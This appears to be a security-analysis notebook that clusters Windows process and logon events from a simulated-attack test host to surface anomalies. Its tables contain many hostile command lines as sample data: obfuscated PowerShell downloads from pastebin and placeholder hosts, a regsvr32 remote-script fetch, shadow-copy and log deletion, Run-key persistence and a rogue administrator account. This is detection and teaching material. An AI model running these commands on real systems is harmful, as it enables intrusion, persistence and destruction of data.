{ "cells": [ { "cell_type": "markdown", "metadata": { "toc": true }, "source": [ "
\n", " | TimeGenerated | \n", "LastEventTime | \n", "NewProcessName | \n", "CommandLine | \n", "ClusterSize | \n", "commandlineTokensFull | \n", "pathScore | \n", "isSystemSession | \n", "
---|---|---|---|---|---|---|---|---|
46 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\reg.exe | \n", ".\\reg not /domain:everything that /sid:shines is /krbtgt:golden ! | \n", "1 | \n", "16 | \n", "2951 | \n", "False | \n", "
356 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\Resources\\222\\pmfexe.exe | \n", "\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\Resources\\222\\pmfexe.exe... | \n", "1 | \n", "27 | \n", "9108 | \n", "True | \n", "
301 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\cmd.exe | \n", "\"cmd\" | \n", "1 | \n", "2 | \n", "2570 | \n", "True | \n", "
256 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\WindowsAzure\\GuestAgent_2.7.41491.901_2019-01-14_202614\\CollectGuestLogs.exe | \n", "\"CollectGuestLogs.exe\" -Mode:ga -FileName:C:\\WindowsAzure\\CollectGuestLogsTemp\\710dc858-9c96-4df... | \n", "1 | \n", "18 | \n", "6421 | \n", "True | \n", "
219 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\wermgr.exe | \n", "C:\\Windows\\system32\\wermgr.exe -upload | \n", "1 | \n", "7 | \n", "2922 | \n", "True | \n", "
198 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c echo \" SYSTEMINFO && SYSTEMINFO && DEL \" | \n", "1 | \n", "17 | \n", "2941 | \n", "False | \n", "
195 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&c:\\windows\\system32\\inetsrv\\appcmd set config \"Default Web S... | \n", "1 | \n", "39 | \n", "2941 | \n", "False | \n", "
176 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\wuauclt.exe | \n", ".\\wuauclt.exe /C \"c:\\windows\\softwaredistribution\\cscript.exe\" | \n", "1 | \n", "14 | \n", "3406 | \n", "False | \n", "
171 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\svchost.exe | \n", "c:\\Windows\\System32\\svchost.exe -k malicious | \n", "1 | \n", "9 | \n", "3040 | \n", "False | \n", "
163 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\netsh.exe | \n", ".\\netsh advfirewall firewall add rule name=RbtGskQ action=allow program=c:\\users\\Bob\\appdata\\Ro... | \n", "1 | \n", "18 | \n", "3179 | \n", "False | \n", "
162 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c C:\\Windows\\System32\\mshta.exe vbscript:CreateObject(\"Wscript.Shell\").Run(\".\\powershell.e... | \n", "1 | \n", "56 | \n", "2941 | \n", "False | \n", "
139 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\powershell.exe | \n", ".\\powershell -command \"(New-Object Net.WebClient).DownloadString(('ht'+'tp://pasteb' + 'bin/'+'... | \n", "1 | \n", "36 | \n", "3726 | \n", "False | \n", "
134 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\wbem\\WmiPrvSE.exe | \n", "C:\\Windows\\system32\\wbem\\wmiprvse.exe -Embedding | \n", "1 | \n", "8 | \n", "3546 | \n", "True | \n", "
133 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\sppsvc.exe | \n", "C:\\Windows\\system32\\sppsvc.exe | \n", "1 | \n", "5 | \n", "2933 | \n", "True | \n", "
130 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\powershell.exe | \n", ".\\powershell -Noninteractive -Noprofile -Command \"Invoke-Expression Get-Process; Invoke-WebRequ... | \n", "1 | \n", "25 | \n", "3726 | \n", "False | \n", "
110 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c \".\\pOWErS^H^ElL^.eX^e^ -^ExEc^Ut^IoNpOliCy BYpa^sS i^mPOr^T-^M^oDuLE biTsTr^ANSFe^R;^S^t... | \n", "1 | \n", "46 | \n", "2941 | \n", "False | \n", "
292 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\taskhostw.exe | \n", "taskhostw.exe SYSTEM | \n", "1 | \n", "2 | \n", "3262 | \n", "True | \n", "
106 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\powershell.exe | \n", ".\\powershell.exe -c \"$a = 'Download'+'String'+\"(('ht'+'tp://paste'+ 'bin/'+'raw/'+'pqCwEm17'))\"... | \n", "1 | \n", "68 | \n", "3726 | \n", "False | \n", "
57 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\tsetup.1.exe | \n", "c:\\Diagnostics\\UserTmp\\tsetup.1.exe C:\\Users\\MSTICAdmin\\AppData\\Local\\Temp\\2\\is-01DD7.tmp\\tsetu... | \n", "1 | \n", "40 | \n", "3405 | \n", "False | \n", "
59 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\netsh.exe | \n", ".\\netsh.exe \"in (*.exe) do start # artificial commandline solely for purposes of triggering test\" | \n", "1 | \n", "22 | \n", "3179 | \n", "False | \n", "
61 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&powershell Enable-WSManCredSSP =2013Role Server -force&ech... | \n", "1 | \n", "28 | \n", "2941 | \n", "False | \n", "
64 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&c:\\windows\\system32\\inetsrv\\appcmd set config \"Default Web... | \n", "1 | \n", "41 | \n", "2941 | \n", "False | \n", "
65 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&del C:\\inetpub\\logs\\logFiles\\W3SVC1\\*.log /q&echo [S]&cd&e... | \n", "1 | \n", "32 | \n", "2941 | \n", "False | \n", "
74 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\dllhost.exe | \n", "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E} | \n", "1 | \n", "12 | \n", "3024 | \n", "True | \n", "
62 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&powershell winrm set winrm/config/service/Auth @{Kerberos=... | \n", "1 | \n", "31 | \n", "2941 | \n", "False | \n", "
78 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\cmd.exe | \n", "cmd /c echo timb@microsoft.com; romead@microsoft.com; ianhelle@microsoft.com; marcook@microsoft... | \n", "1 | \n", "21 | \n", "2570 | \n", "False | \n", "
82 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\net1.exe | \n", "C:\\Windows\\system32\\net1 share TestShare=c:\\testshare /Grant:Users,Read | \n", "1 | \n", "13 | \n", "2638 | \n", "False | \n", "
83 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\Dism.exe | \n", "dism /online /enable-feature /featurename:File-Services /NoRestart | \n", "1 | \n", "11 | \n", "2659 | \n", "True | \n", "
86 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\Temp\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\DismHost.exe | \n", "C:\\Windows\\TEMP\\CC563BBE-DE32-44D3-8E35-F3FC78E72E40\\dismhost.exe {D57BA872-53C0-424D-80AE-E4911... | \n", "1 | \n", "15 | \n", "4900 | \n", "True | \n", "
87 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\servicing\\TrustedInstaller.exe | \n", "C:\\Windows\\servicing\\TrustedInstaller.exe | \n", "1 | \n", "5 | \n", "4175 | \n", "True | \n", "
94 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\regsvr32.exe | \n", ".\\regsvr32 /s /n /u /i:http://server/file.sct scrobj.dll | \n", "1 | \n", "20 | \n", "3399 | \n", "False | \n", "
75 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Windows\\System32\\cmd.exe | \n", "cmd.exe /c c:\\Diagnostics\\WindowsSimulateDetections.bat c:\\Diagnostics\\UserTmp | \n", "1 | \n", "12 | \n", "2570 | \n", "True | \n", "
108 | \n", "2019-01-15 04:23:43.103 | \n", "2019-01-15 05:15:20.623 | \n", "C:\\Diagnostics\\UserTmp\\powershell.exe | \n", ".\\powershell -c {IEX (New-Object Net.WebClient).DownloadString(('ht'+(\"{2}{0}{1}\"-f ':/','/past... | \n", "1 | \n", "53 | \n", "3726 | \n", "False | \n", "
63 | \n", "2019-01-15 05:15:16.850 | \n", "2019-01-15 05:15:17.580 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\ProgramData\"&copy \\\\[REDACTED]\\c$\\users\\[REDACTED]\\Documents\\\"Password Chan... | \n", "2 | \n", "29 | \n", "2941 | \n", "False | \n", "
211 | \n", "2019-01-15 05:15:19.223 | \n", "2019-01-15 05:15:19.337 | \n", "C:\\Diagnostics\\UserTmp\\hd.exe | \n", "hd.exe -pslist | \n", "2 | \n", "4 | \n", "2837 | \n", "False | \n", "
190 | \n", "2019-01-15 05:15:18.287 | \n", "2019-01-15 05:15:18.967 | \n", "C:\\Diagnostics\\UserTmp\\lsass.exe | \n", ".\\lsass.exe /C \"c:\\windows\\softwaredistribution\\cscript.exe\" | \n", "2 | \n", "14 | \n", "3183 | \n", "False | \n", "
149 | \n", "2019-01-15 05:15:15.520 | \n", "2019-01-15 05:15:15.923 | \n", "C:\\Windows\\System32\\net.exe | \n", "net group \"Domain Admins\" /domain | \n", "2 | \n", "8 | \n", "2589 | \n", "False | \n", "
104 | \n", "2019-01-15 05:15:12.977 | \n", "2019-01-15 05:15:19.583 | \n", "C:\\Diagnostics\\UserTmp\\powershell.exe | \n", ".\\powershell -command {(n`EW-obJ`E`cT N`et`.W`eb`C`li`en`t).DownloadFile('https://blah/png','go... | \n", "2 | \n", "24 | \n", "3726 | \n", "False | \n", "
95 | \n", "2019-01-15 05:15:10.817 | \n", "2019-01-15 05:15:14.453 | \n", "C:\\Windows\\System32\\svchost.exe | \n", "C:\\Windows\\system32\\svchost.exe -k wsappx | \n", "2 | \n", "8 | \n", "3040 | \n", "True | \n", "
77 | \n", "2019-01-15 05:15:03.247 | \n", "2019-01-15 05:15:11.260 | \n", "C:\\Windows\\System32\\cmd.exe | \n", "cmd /c echo Any questions about the commands executed here then please contact one of | \n", "2 | \n", "16 | \n", "2570 | \n", "False | \n", "
270 | \n", "2019-01-15 04:28:01.517 | \n", "2019-01-15 04:28:33.090 | \n", "C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe | \n", "\"C:\\Program Files (x86)\\Google\\Update\\GoogleUpdate.exe\" /ua /installsource scheduler | \n", "2 | \n", "17 | \n", "4895 | \n", "True | \n", "
254 | \n", "2019-01-15 04:42:25.437 | \n", "2019-01-15 05:12:25.403 | \n", "C:\\Windows\\System32\\MusNotification.exe | \n", "C:\\Windows\\system32\\MusNotification.exe Display | \n", "2 | \n", "6 | \n", "3826 | \n", "True | \n", "
60 | \n", "2019-01-15 05:15:15.827 | \n", "2019-01-15 05:15:16.720 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", ".\\cmd /c \"cd /d \"C:\\inetpub\\wwwroot\"&powershell Set-ExecutionPolicy RemoteSigned&echo [S]&cd&ec... | \n", "3 | \n", "25 | \n", "2941 | \n", "False | \n", "
142 | \n", "2019-01-15 05:15:14.770 | \n", "2019-01-15 05:15:15.283 | \n", "C:\\Windows\\System32\\whoami.exe | \n", "whoami | \n", "3 | \n", "0 | \n", "2907 | \n", "False | \n", "
125 | \n", "2019-01-15 05:15:12.123 | \n", "2019-01-15 05:15:17.650 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c \"echo Invoke-Expression Get-Process; Invoke-WebRequest -Uri http://badguyserver/pwnme\" | \n", "3 | \n", "21 | \n", "2941 | \n", "False | \n", "
56 | \n", "2019-01-15 05:15:16.117 | \n", "2019-01-15 05:15:18.403 | \n", "C:\\Diagnostics\\UserTmp\\reg.exe | \n", ".\\reg.exe add \\hkcu\\software\\microsoft\\some\\key\\Run /v abadvalue | \n", "3 | \n", "15 | \n", "2951 | \n", "False | \n", "
85 | \n", "2019-01-15 05:15:03.830 | \n", "2019-01-15 05:15:19.447 | \n", "C:\\Windows\\System32\\net.exe | \n", "net use q: \\\\MSTICAlertsWin1\\TestShare Bob_testing /User:adm1nistrator | \n", "3 | \n", "12 | \n", "2589 | \n", "False | \n", "
49 | \n", "2019-01-15 05:15:16.353 | \n", "2019-01-15 05:15:16.520 | \n", "C:\\Diagnostics\\UserTmp\\42424.exe | \n", "42424.exe | \n", "3 | \n", "1 | \n", "2889 | \n", "False | \n", "
69 | \n", "2019-01-15 05:15:03.390 | \n", "2019-01-15 05:15:17.137 | \n", "C:\\Windows\\System32\\vssadmin.exe | \n", "vssadmin delete shadows /all /quiet | \n", "4 | \n", "7 | \n", "3131 | \n", "False | \n", "
193 | \n", "2019-01-15 05:02:28.260 | \n", "2019-01-15 05:15:19.537 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c \"powershell wscript.shell used to download a .gif\" | \n", "5 | \n", "14 | \n", "2941 | \n", "False | \n", "
169 | \n", "2019-01-15 05:15:14.493 | \n", "2019-01-15 05:15:19.060 | \n", "C:\\Diagnostics\\UserTmp\\svchost.exe | \n", "c:\\Diagnostics\\UserTmp\\svchost.exe | \n", "6 | \n", "6 | \n", "3411 | \n", "False | \n", "
122 | \n", "2019-01-15 05:15:11.947 | \n", "2019-01-15 05:15:19.403 | \n", "C:\\Diagnostics\\UserTmp\\implant.exe | \n", "implant.exe k111 | \n", "7 | \n", "3 | \n", "3390 | \n", "False | \n", "
68 | \n", "2019-01-15 05:15:12.513 | \n", "2019-01-15 05:15:18.630 | \n", "C:\\Diagnostics\\UserTmp\\doubleextension.pdf.exe | \n", "c:\\Diagnostics\\UserTmp\\doubleextension.pdf.exe | \n", "7 | \n", "7 | \n", "4617 | \n", "False | \n", "
80 | \n", "2019-01-15 05:15:03.410 | \n", "2019-01-15 05:15:18.670 | \n", "C:\\Windows\\System32\\net1.exe | \n", "C:\\Windows\\system32\\net1 user adm1nistrator Bob_testing /add | \n", "7 | \n", "10 | \n", "2638 | \n", "False | \n", "
67 | \n", "2019-01-15 05:15:05.193 | \n", "2019-01-15 05:15:19.617 | \n", "C:\\Diagnostics\\UserTmp\\sdopfjiowtbkjfnbeioruj.exe | \n", "c:\\Diagnostics\\UserTmp\\sdopfjiowtbkjfnbeioruj.exe | \n", "9 | \n", "6 | \n", "5005 | \n", "False | \n", "
48 | \n", "2019-01-15 05:15:10.667 | \n", "2019-01-15 05:15:18.917 | \n", "C:\\Diagnostics\\UserTmp\\rundll32.exe | \n", ".\\rundll32 /C 42424.exe | \n", "15 | \n", "7 | \n", "3391 | \n", "False | \n", "
47 | \n", "2019-01-15 05:15:03.057 | \n", "2019-01-15 05:15:18.820 | \n", "C:\\Diagnostics\\UserTmp\\cmd.exe | \n", "cmd /c \"systeminfo && systeminfo\" | \n", "23 | \n", "10 | \n", "2941 | \n", "False | \n", "
96 | \n", "2019-01-15 05:15:11.190 | \n", "2019-01-15 05:15:18.867 | \n", "C:\\Windows\\System32\\win32calc.exe | \n", "\"C:\\Windows\\System32\\win32calc.exe\" | \n", "28 | \n", "8 | \n", "3100 | \n", "False | \n", "
0 | \n", "2019-01-15 04:16:24.007 | \n", "2019-01-15 05:24:24.010 | \n", "C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\De... | \n", "\"C:\\Program Files\\Microsoft Monitoring Agent\\Agent\\Health Service State\\CT_602681692\\NativeDSC\\D... | \n", "35 | \n", "52 | \n", "12225 | \n", "True | \n", "
2 | \n", "2019-01-15 04:16:25.550 | \n", "2019-01-15 05:24:25.807 | \n", "C:\\Windows\\SysWOW64\\wbem\\WmiPrvSE.exe | \n", "C:\\Windows\\sysWOW64\\wbem\\wmiprvse.exe -secured -Embedding | \n", "38 | \n", "10 | \n", "3478 | \n", "True | \n", "
1 | \n", "2019-01-15 04:16:24.027 | \n", "2019-01-15 05:24:24.023 | \n", "C:\\Windows\\System32\\conhost.exe | \n", "\\??\\C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1 | \n", "39 | \n", "10 | \n", "3028 | \n", "True | \n", "
3 | \n", "2019-01-15 04:15:26.000 | \n", "2019-01-15 05:24:26.010 | \n", "C:\\Windows\\System32\\cscript.exe | \n", "\"C:\\Windows\\system32\\cscript.exe\" /nologo \"MonitorKnowledgeDiscovery.vbs\" | \n", "71 | \n", "13 | \n", "3022 | \n", "True | \n", "
\n", " | ClusterSize | \n", "processName | \n", "CommandLine | \n", "ClusterId | \n", "
---|---|---|---|---|
46 | \n", "1 | \n", "reg.exe | \n", ".\\reg not /domain:everything that /sid:shines is /krbtgt:golden ! | \n", "-1 | \n", "
56 | \n", "3 | \n", "reg.exe | \n", ".\\reg.exe add \\hkcu\\software\\microsoft\\some\\key\\Run /v abadvalue | \n", "7 | \n", "
\\n\"+\n \"\n", " | Unnamed: 0 | \n", "TenantId | \n", "Account | \n", "EventID | \n", "TimeGenerated | \n", "SourceComputerId | \n", "Computer | \n", "SubjectUserName | \n", "SubjectDomainName | \n", "SubjectUserSid | \n", "TargetUserName | \n", "TargetDomainName | \n", "TargetUserSid | \n", "TargetLogonId | \n", "LogonProcessName | \n", "LogonType | \n", "AuthenticationPackageName | \n", "Status | \n", "IpAddress | \n", "WorkstationName | \n", "AccountNum | \n", "LogonHour | \n", "Clustered | \n", "ClusterId | \n", "ClusterSize | \n", "FirstEventTime | \n", "LastEventTime | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
1 | \n", "1 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "NT AUTHORITY\\SYSTEM | \n", "4624 | \n", "2019-01-15 01:42:28.340 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "MSTICAlertsWin1 | \n", "MSTICAlertsWin1$ | \n", "WORKGROUP | \n", "S-1-5-18 | \n", "SYSTEM | \n", "NT AUTHORITY | \n", "S-1-5-18 | \n", "0x3e7 | \n", "Advapi | \n", "5 | \n", "Negotiate | \n", "NaN | \n", "- | \n", "- | \n", "1484 | \n", "5 | \n", "True | \n", "1 | \n", "11 | \n", "2019-01-15 01:42:28.340 | \n", "2019-01-15 05:15:14.453 | \n", "
0 | \n", "0 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "MSTICAlertsWin1\\MSTICAdmin | \n", "4624 | \n", "2019-01-15 04:28:33.090 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "MSTICAlertsWin1 | \n", "MSTICAlertsWin1$ | \n", "WORKGROUP | \n", "S-1-5-18 | \n", "MSTICAdmin | \n", "MSTICAlertsWin1 | \n", "S-1-5-21-996632719-2361334927-4038480536-500 | \n", "0xfaac27 | \n", "Advapi | \n", "4 | \n", "Negotiate | \n", "NaN | \n", "- | \n", "MSTICAlertsWin1 | \n", "2319 | \n", "5 | \n", "True | \n", "0 | \n", "2 | \n", "2019-01-15 04:28:33.090 | \n", "2019-01-15 05:15:02.980 | \n", "
2 | \n", "2 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "MSTICAlertsWin1\\adm1nistrator | \n", "4624 | \n", "2019-01-15 05:15:06.363 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "MSTICAlertsWin1 | \n", "- | \n", "- | \n", "S-1-0-0 | \n", "adm1nistrator | \n", "MSTICAlertsWin1 | \n", "S-1-5-21-996632719-2361334927-4038480536-1066 | \n", "0xfb5ee6 | \n", "NtLmSsp | \n", "3 | \n", "NTLM | \n", "NaN | \n", "fe80::38dc:e4a9:61bd:b458 | \n", "MSTICAlertsWin1 | \n", "2799 | \n", "5 | \n", "False | \n", "-1 | \n", "1 | \n", "2019-01-15 05:15:06.363 | \n", "2019-01-15 05:15:06.363 | \n", "
Account: adm1nistrator Account Domain: MSTICAlertsWin1 Logon Time: 2019-01-15 05:15:06.363000 Logon type: 3(Network) User Id/SID: S-1-5-21-996632719-2361334927-4038480536-1066 SID S-1-5-21-996632719-2361334927-4038480536-1066 is local machine or domain account Subject (source) account: -/- Logon process: NtLmSsp Authentication: NTLM Source IpAddress: fe80::38dc:e4a9:61bd:b458 Source Host: MSTICAlertsWin1 Logon status: nan (no Status code recorded; EventID 4624 is a successful logon). Note (review): this is the only logon left unclustered (Clustered=False, ClusterSize=1), and the same account appears in the process table seconds earlier — `net1 user adm1nistrator Bob_testing /add` at 05:15:03 and `net use q: \\MSTICAlertsWin1\TestShare ... /User:adm1nistrator` — so a freshly created administrator-lookalike account authenticating over NTLM (type 3) from the host's own link-local IPv6 address is the pivot point to investigate first; bear in mind the host data here is generated by WindowsSimulateDetections.bat, not a live intrusion. |
Account: MSTICAdmin Account Domain: MSTICAlertsWin1 Logon Time: 2019-01-15 04:28:33.090000 Logon type: 4(Batch) User Id/SID: S-1-5-21-996632719-2361334927-4038480536-500 SID S-1-5-21-996632719-2361334927-4038480536-500 is administrator SID S-1-5-21-996632719-2361334927-4038480536-500 is local machine or domain account Subject (source) account: WORKGROUP/MSTICAlertsWin1$ Logon process: Advapi Authentication: Negotiate Source IpAddress: - Source Host: MSTICAlertsWin1 Logon status: nan |
Account: SYSTEM Account Domain: NT AUTHORITY Logon Time: 2019-01-15 01:42:28.340000 Logon type: 5(Service) User Id/SID: S-1-5-18 SID S-1-5-18 is LOCAL_SYSTEM Subject (source) account: WORKGROUP/MSTICAlertsWin1$ Logon process: Advapi Authentication: Negotiate Source IpAddress: - Source Host: - Logon status: nan |
\n", " | Unnamed: 0 | \n", "TenantId | \n", "Account | \n", "EventID | \n", "TimeGenerated | \n", "SourceComputerId | \n", "Computer | \n", "SubjectUserName | \n", "SubjectDomainName | \n", "SubjectUserSid | \n", "TargetUserName | \n", "TargetDomainName | \n", "TargetUserSid | \n", "TargetLogonId | \n", "LogonProcessName | \n", "LogonType | \n", "AuthenticationPackageName | \n", "Status | \n", "IpAddress | \n", "WorkstationName | \n", "AccountNum | \n", "LogonHour | \n", "Clustered | \n", "ClusterId | \n", "ClusterSize | \n", "FirstEventTime | \n", "LastEventTime | \n", "
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
2 | \n", "2 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "MSTICAlertsWin1\\adm1nistrator | \n", "4624 | \n", "2019-01-15 05:15:06.363 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "MSTICAlertsWin1 | \n", "- | \n", "- | \n", "S-1-0-0 | \n", "adm1nistrator | \n", "MSTICAlertsWin1 | \n", "S-1-5-21-996632719-2361334927-4038480536-1066 | \n", "0xfb5ee6 | \n", "NtLmSsp | \n", "3 | \n", "NTLM | \n", "NaN | \n", "fe80::38dc:e4a9:61bd:b458 | \n", "MSTICAlertsWin1 | \n", "2799 | \n", "5 | \n", "False | \n", "-1 | \n", "1 | \n", "2019-01-15 05:15:06.363 | \n", "2019-01-15 05:15:06.363 | \n", "
0 | \n", "0 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "MSTICAlertsWin1\\MSTICAdmin | \n", "4624 | \n", "2019-01-15 04:28:33.090 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "MSTICAlertsWin1 | \n", "MSTICAlertsWin1$ | \n", "WORKGROUP | \n", "S-1-5-18 | \n", "MSTICAdmin | \n", "MSTICAlertsWin1 | \n", "S-1-5-21-996632719-2361334927-4038480536-500 | \n", "0xfaac27 | \n", "Advapi | \n", "4 | \n", "Negotiate | \n", "NaN | \n", "- | \n", "MSTICAlertsWin1 | \n", "2319 | \n", "5 | \n", "True | \n", "0 | \n", "2 | \n", "2019-01-15 04:28:33.090 | \n", "2019-01-15 05:15:02.980 | \n", "
1 | \n", "1 | \n", "802d39e1-9d70-404d-832c-2de5e2478eda | \n", "NT AUTHORITY\\SYSTEM | \n", "4624 | \n", "2019-01-15 01:42:28.340 | \n", "46fe7078-61bb-4bed-9430-7ac01d91c273 | \n", "MSTICAlertsWin1 | \n", "MSTICAlertsWin1$ | \n", "WORKGROUP | \n", "S-1-5-18 | \n", "SYSTEM | \n", "NT AUTHORITY | \n", "S-1-5-18 | \n", "0x3e7 | \n", "Advapi | \n", "5 | \n", "Negotiate | \n", "NaN | \n", "- | \n", "- | \n", "1484 | \n", "5 | \n", "True | \n", "1 | \n", "11 | \n", "2019-01-15 01:42:28.340 | \n", "2019-01-15 05:15:14.453 | \n", "
\\n\"+\n \"\n", " | \n", " | TimeGenerated | \n", "
---|---|---|
Account | \n", "LogonType | \n", "\n", " |
MSTICAlertsWin1\\MSTICAdmin | \n", "4 | \n", "2 | \n", "
MSTICAlertsWin1\\adm1nistrator | \n", "3 | \n", "1 | \n", "
NT AUTHORITY\\SYSTEM | \n", "5 | \n", "11 | \n", "